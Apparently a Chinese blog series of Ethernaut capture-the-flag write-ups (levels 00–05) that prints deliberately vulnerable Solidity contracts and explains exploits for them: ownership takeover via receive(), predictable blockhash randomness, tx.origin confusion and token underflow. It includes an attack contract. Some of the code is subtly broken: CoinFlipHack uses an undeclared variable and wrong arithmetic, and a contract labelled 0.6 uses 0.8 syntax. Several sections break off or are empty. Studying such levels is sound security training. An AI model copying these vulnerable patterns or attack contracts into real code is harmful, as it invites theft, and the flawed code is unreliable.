Ethernaut on Kyrin Labs

Ethernaut - 01 Fallback

Sat, 08 Nov 2025 00:00:00 +0000

1. 信息：

1.1. 提示信息

进入这一关后，首先可以看到提示：

[!提示]

Look carefully at the contract’s code below.

You will beat this level if

you claim ownership of the contract

you reduce its balance to 0

Things that might help

How to send ether when interacting with an ABI

How to send ether outside of the ABI

Converting to and from wei/ether units (see help() command)

Fallback methods

1.2. 合约代码

直接看合约代码(直接在代码里通过注释的方式，分析代码的功能)：

 
 
 
 
// SPDX-License-Identifier: MIT
// `pragma` specifies the compiler version of Solidity.
pragma solidity ^0.8.0;

contract Fallback { // 合约名称为：`Fallback`
	// 将地址`address`映射到无符号256位整数`uint256`,这个映射的名字是 `contributions`.
	// 关键字 `public` 表示Solidity会自动为这个映射生成一个gatter函数，使外部和内部一样可以通过调用`contributions(address)`来查询某个地址对应的uint256值
	// 这个 `mapping` 的功能是记录每个地址的贡献值
 mapping(address => uint256) public contributions;

 // 声明一个公开的地址状态变量 `owner`，关键字 `public` 的作用还是生成gatter函数.
 address public owner;

	// 构造函数，部署合约时只执行一次
 constructor() {
		// 让部署者成为owner，`msg.sender` 中存储的是当前函数调用者的地址
 owner = msg.sender;
 // 调用这段代码开头的 `contributions` 函数，owner拥有1000ETH的初始贡献（注意：这里是以wei为单位，所以实际是1000*10^18 wei）
 contributions[msg.sender] = 1000 * (1 ether);
 }

	// 这是一个修饰器
 modifier onlyOwner() {
	 // `require` 是用来条件检查语句，
 require(msg.sender == owner, "caller is not the owner");// 只有拥有者可以调用，否则回滚交易并清空所有Gas
 _; // 原函数体的插入位置
 }

	// `payable` 函数是可以接收ETH的函数
 function contribute() public payable {
 require(msg.value < 0.001 ether); // 要求每次贡献的金额小于0.001 ether
 contributions[msg.sender] += msg.value; // 累加发送者的贡献值
 // 这个 `if` 用来判断如果当前发送者的贡献值超过当前拥有者的贡献值，则更新拥有者为当前发送者
 if (contributions[msg.sender] > contributions[owner]) {
 owner = msg.sender;
 }
 }

	// `view` 函数只读取数据，在链外调用时，不消耗Gas
 function getContribution() public view returns (uint256) {
 // 返回当前发送者的贡献值
 return contributions[msg.sender];
 }

	// `onlyOwner` 修饰器负责权限控制，只用owner可以调用
	// **address(this).balance**：合约当前的ETH余额
	// **payable转换**：将address转换为payable address以接收ETH
	// **transfer函数**：发送ETH到指定地址（2300 Gas限制，自动失败）
 function withdraw() public onlyOwner {
 payable(owner).transfer(address(this).balance);
 }

	//- **receive函数**：专门处理纯ETH转账的特殊函数
	//- **external可见性**：只能从外部调用
	//- **payable**：可以接收ETH
	//- **条件限制**：需要发送ETH且发送者已有贡献记录
	//- **所有权转移**：满足条件时立即成为新owner
 receive() external payable {
 require(msg.value > 0 && contributions[msg.sender] > 0);
 owner = msg.sender;
 }
}

2. 分析

2.1. 合约代码逻辑分析

和合约代码逻辑 && 漏洞利用逻辑从函数 “contribute()" 可以看出 “owner” 的贡献为 1000 ETH 。有一种变成 “owner” 的方式是贡献大于当前 “owner” 的 1000 ETH。显然不太可能。那么还有一种方式就是通过 “receive()” 函数，观察代码可知，当贡献已大于0，并且再发送大于0的金额时，就会被设置成 “owner” 。

Ethernaut - 02 FAL1OUT

Sat, 08 Nov 2025 00:00:00 +0000

1. 信息：

1.1. 提示信息

进入这一关后，首先可以看到提示：

[!提示]

Look carefully at the contract’s code below.

Ethernaut - 03 Coin Flip

Sat, 08 Nov 2025 00:00:00 +0000

踩坑记录：区块链上的随机数很难。最初以为用 block.number 就够了，结果看了 Writeup 才知道这是确定性环境。

核心漏洞：blockhash() 可被预测

 
 
 
 
// 有问题的合约代码
contract CoinFlip {
 uint256 public consecutiveWins;
 uint256 lastHash;

 function flip(bool _guess) public returns (bool) {
 uint256 blockValue = uint256(blockhash(block.number - 1));

 if (lastHash == blockValue) {
 revert();
 }

 lastHash = blockValue;
 uint256 coinFlip = blockValue / 2;
 bool side = coinFlip == 1 ? true : false;

 if (side == _guess) {
 consecutiveWins++;
 return true;
 } else {
 consecutiveWins = 0;
 return false;
 }
 }
}

攻击思路（来源：Ethernaut 官方解答）：由于 block.number - 1 的哈希在交易打包时已知，我们可以部署攻击合约提前计算：

 
 
 
 
// 攻击合约（需部署到相同区块）
contract CoinFlipHack {
 CoinFlip public victim;
 uint256 public consecutiveWins;

 constructor(address _victim) {
 victim = CoinFlip(_victim);
 }

 function attack() public {
 uint256 blockValue = uint256(blockhash(block.number - 1));
 uint256 coinFlip = blockValue / 2;
 bool guess = coinFlip == 1 ? true : false;

 victim.flip(guess);
 }

 // 必须每个区块调用一次，因为 blockhash 只在当前区块有效
 function attackInLoop() public {
 for (uint i = 0; i < 10; i++) {
 // 需要等待新区块
 require(block.number > lastBlock, "Wait for new block");
 attack();
 lastBlock = block.number;
 }
 }
}

成功条件：连续赢 10 次

Ethernaut - 04 Telephone

Sat, 08 Nov 2025 00:00:00 +0000

核心漏洞：tx.origin 与 msg.sender 的区别

 
 
 
 
contract Telephone {
 address public owner;

 function changeOwner(address _owner) public {
 if (tx.origin != msg.sender) { // 这里本意是防止合约调用，但逻辑反了
 owner = _owner;
 }
 }
}

攻击思路（来源：OpenZeppelin 安全博文）： tx.origin 是最初发起交易的外部账户（EOA），而 msg.sender 是最近一次调用的地址。

攻击流程：

你的 EOA (tx.origin) → 攻击合约 (msg.sender) → Telephone合约

在 Telephone 合约中：

tx.origin = 你的 EOA（外部账户）
msg.sender = 攻击合约地址

所以 tx.origin != msg.sender 条件为 true，满足 owner 变更条件。

Ethernaut - 05 Token

Sat, 08 Nov 2025 00:00:00 +0000

踩坑记录：版本管理的重要性。

核心漏洞：未检查余额扣减时的整数下溢

 
 
 
 
// 漏洞合约（版本 ^0.6.0）
contract Token {
 mapping(address => uint) balances;
 uint256 public totalSupply;

 constructor(uint256 _initialSupply) public {
 balances[msg.sender] = totalSupply = _initialSupply;
 }

 function transfer(address _to, uint256 _value) public returns (bool) {
 // 这里使用了 unchecked！
 unchecked {
 balances[msg.sender] -= _value; // 若余额不足，会下溢到 2^256-1
 balances[_to] += _value;
 }
 return true;
 }
}

攻击流程（来源：OpenZeppelin 安全博文）：如果你的余额是 20，你要转账 21：

balances[msg.sender] -= 21 → 下溢 → 余额 = 2^256 - 1
瞬间获得无限代币

攻击步骤：

获取初始代币（比如 20 个）
调用 transfer(受害地址, 21)
你的余额变为极大值

个人感悟：版本管理！版本管理！版本管理！版本管理！版本管理！版本管理！版本管理！版本管理！

Ethernaut - 00 Hello Ethernaut

Sat, 08 Nov 2025 00:00:00 +0000

解题的时候没有记录。。。。。。。。。

简单写一下流程：

1. 访问网站"https://ethernaut.openzeppelin.com/"

![[Pasted image 20251108102304.png]]

2. 点击"00"的小手图标后进入第一个题目(Hello Ethernaut):

![[Pasted image 20251108102641.png]]

3. 随后按照教学步骤操作即可。

这里记录一下踩到的坑和解题步骤：

1. 坑：水龙头提取不到i测试币

Note

（发现目前几个水龙头都有点问题），要求钱包里至少有0.001ETH或者1Link之类的

![[Pasted image 20251108105610.png]] 目前这几个都没领到测试币：

https://faucets.chain.link/ https://cloud.google.com/application/web3/faucet/ethereum/sepolia

解决方法：

Note

1、给钱包里放超过0.001ETH后，这个网站可以领到币（https://faucet.quicknode.com/ethereum/sepolia）。

2、听说B站有博主，关注之后会定期放水，有空可以了解一下。

![[Pasted image 20251108114327.png]]

解题步骤：

按照新手指引，创建好钱包、账户并获取了测试币后，打开浏览器控制台
在控制台输入指令顺序大致如下()： Step_1：（按照提示获得的第一个method，）

await contract.info()
// Output: 'You will find what you need in info1().'

Step_2：（根据info的输出获得第二个method是info1）